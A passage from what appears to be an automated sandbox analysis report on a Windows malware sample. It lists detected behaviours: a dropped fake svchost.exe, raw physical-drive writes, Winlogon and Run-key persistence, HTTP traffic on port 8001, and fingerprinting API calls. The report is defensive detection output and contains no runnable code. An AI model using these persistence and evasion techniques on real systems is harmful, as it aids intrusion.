Source: C:\Windows\apppatch\svchost.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 2_2_02BC33F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 5_2_006A33F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 6_2_014E33F0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe File created: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Executable created and started: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Code function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\ 0_2_00403560

Boot Survival

Source: C:\Windows\apppatch\svchost.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 2_2_02BC33F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 5_2_006A33F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 6_2_014E33F0
Source: C:\Windows\apppatch\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

Source: c:\users\user\desktop\ojkmjjm2yt.exe File moved: C:\Users\user\AppData\Local\Temp\BB59.tmp
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 8001
Source: unknown Network traffic detected: HTTP traffic on port 8001 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 57349 -> 8001
Source: unknown Network traffic detected: HTTP traffic on port 8001 -> 57349
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BBD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog, 2_2_02BBD300
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BB9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup, 2_2_02BB9ED0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BBCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow, 2_2_02BBCFE9
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow, 2_2_02BBCDC0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BBCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow, 2_2_02BBCD50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_0069D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog, 5_2_0069D300
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_0069CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow, 5_2_0069CD50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_0069CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow, 5_2_0069CDC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_00699ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup, 5_2_00699ED0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_0069CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow, 5_2_0069CFE9
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014DD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog, 6_2_014DD300
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014DCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow, 6_2_014DCD50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow, 6_2_014DCDC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014DCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow, 6_2_014DCFE9
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014D9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup, 6_2_014D9ED0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress, 2_2_02BC5720
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,Un
lockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 2_2_02BB4B00
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00694B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,Unl
ockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 5_2_00694B00
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,